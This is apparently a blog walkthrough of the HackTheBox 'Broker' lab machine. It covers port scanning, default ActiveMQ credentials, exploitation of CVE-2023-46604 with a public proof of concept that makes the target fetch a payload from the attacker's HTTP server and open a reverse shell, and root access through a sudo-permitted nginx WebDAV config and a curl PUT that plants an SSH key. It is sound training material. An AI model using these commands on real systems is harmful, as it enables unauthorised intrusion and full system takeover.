HTB - Broker

HTB – Broker

In this walk through, we will be going through the Broker room from HackTheBox. This room is rated as Easy on the platform and it consists of exploitation of a RCE in ActiveMQ installation. For privilege escalation, sudo misconfiguration was abused to get root. So, let’s get started without any delay.

Broker

Machine Info:

TitleBroker
IPaddress10.10.11.243
DifficultyEasy
OSLinux
DescriptionBroker is an easy difficulty Linux machine hosting a vulnerable version of ActiveMQ which has a Unauthenticated RCE in it. For Privilege escalation, abuse of sudo misconfiguration was done to get root.

Enumeration:

  • I started off with an Aggressive nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH).

$ sudo nmap -A 10.10.11.243
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-12 09:51 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.243, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:47265 > 10.10.11.243:53 S ttl=49 id=45830 iplen=44  seq=2706207728 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.243, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:47266 > 10.10.11.243:53 S ttl=57 id=10726 iplen=44  seq=2706142193 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.243, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:47267 > 10.10.11.243:53 S ttl=55 id=47771 iplen=44  seq=2706338802 win=1024 <mss 1460>
Nmap scan report for 10.10.11.243
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    nginx 1.18.0 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/12%OT=22%CT=1%CU=39932%PV=Y%DS=2%DC=T%G=Y%TM=6577DF
OS:DC%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=101%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%
OS:O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2
OS:=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNS
OS:NW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%
OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   209.80 ms 10.10.14.1
2   210.00 ms 10.10.11.243

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.91 seconds

nmap scan

  • Looked into the web server on port 80 and it prompts me to enter a username and password combo in order to proceed further.

login JS popup

  • I thought that there could be other open ports which i might have been missed with the default nmap scan. So, i initiated another nmap scan to scan for all 65,535 ports and found many of them opened which i have missed earlier.

sudo nmap -sS -T5 -p- 10.10.11.243

full port scan

  • The nmap scan for port 80 reveals an interesting header – basic realm=ActiveMQRealm. So, i googled it and found that it belongs to Apache Active MQ service which runs by default on port 8161. As per the above nmap port scan results, we have it in the open state. Sweet!

Active MQ

  • I looked into the running application on port 8161 and it too prompts me to login in order to proceed further.

HTTP ERROR 401 Unauthorized

requires login

  • Found the default credentials for Apache ActiveMQ in one of the medium article online – admin:admin

Default creds

  • With the default creds, i was able to got into the Active MQ installation. The very first thing that caught my attention was the version running – 5.15.15.

ActiveMQ backend

  • I looked for any known vulnerabilities for the concerned version and found a recent Remote Code Execution vulnerability with CVE-2023-46604.

CVE-2023-46604

Initial Access:

  • Found a working exploit POC on the below github repo. Cloned it on my machine and changed the IP address and port in the poc.xml file. The exploit uses the poc.xml and upload it on the target which then allows the RCE due to unsafe deserialization practices within the Openwire protocol.

Exploit: https://github.com/evkl1d/CVE-2023-46604

CVE-2023-46604 POC exploit

Fixing the exploit

  • Spawned a python HTTP server on port 8080 to server the poc.xml file.

python3 -m http.server

python HTTP server

  • Fired the exploit on the target IP on port 61616 with the URL of our python HTTP server serving the poc.xml file.

python3 exploit.py -i 10.10.11.243 -p 61616 -u http://10.10.14.24:8000/poc.xml

Executing exploit

  • Once the exploit execution is complete, we will get a reverse connection back at our netcat listener and thus getting the Initial foothold.

getting initial access

  • Captured the user flag.

user flag

Privilege Escalation:

  • Checked the sudo permissions for our current user and found that we can run the nginx binary as root.

sudo -l

sudo -l

  • At this point, i was a little lost for the privilege escalation part. Found out that we can misuse the ngx_http_dav_module to put our SSH keys in the root’s .ssh/authorized_keys file. For that, we have to create a nginx config file with the below code. The below code, opens listening port at 1337 as user root and then use the dav_methods PUT method to allow file upload via WebDav.

user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
		worker_connections 768;
}
http {
	server {
		listen 1337;
		root /;
		autoindex on;
		dav_methods PUT;
		}
}

  • In my case, i generated the file at my local machine and then downloaded it on the server.

pwn.conf

  • Executed the generated config file as root and then checked if our specified port number is listening with the below command.

sudo nginx -c /tmp/pwn.conf

ss -tlpn

sudo nginx -c /tmp/pwn.conf

  • Next, generated the ssh key pairs using ssh-keygen.

$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/activemq/.ssh/id_rsa): ./root
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./root
Your public key has been saved in ./root.pub
The key fingerprint is:
SHA256:ySKn/DPKFEBCWBhwNN4asc0gZJki5wHJV8Fllxhicf4 activemq@broker
The key's randomart image is:
+---[RSA 3072]----+
|%@@ o*+=o..      |
|BXoX..=...       |
|oo*.+  .         |
|  .+   ...       |
|  . o o SE       |
|   . = .         |
|    +            |
|   o .o          |
|    o..o         |
+----[SHA256]-----+

ssh-keygen

  • Next, uploaded the generated public key to root user .ssh/authorized_keys file with the below command.

curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat root.pub)"

upload generated public key

  • Used the generated private key to log in as root via SSH.

ssh -i root root@localhost

ssh to root@localhost

got root

  • Finally, captured the root flag and completed the room.

root flag

Machine completed

Also Read: HTB – Atom

Conclusion:

Conclusion

So that was “Broker” for you. The machine features a hosting of a version of Apache ActiveMQ which was vulnerable to an Unauthenticated RCE which was then used for the initial access. Further, Post-exploitation enumeration reveals that the system has a sudo misconfiguration allowing the activemq user to execute sudo /usr/sbin/nginx and it was then leveraged to gain root access. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top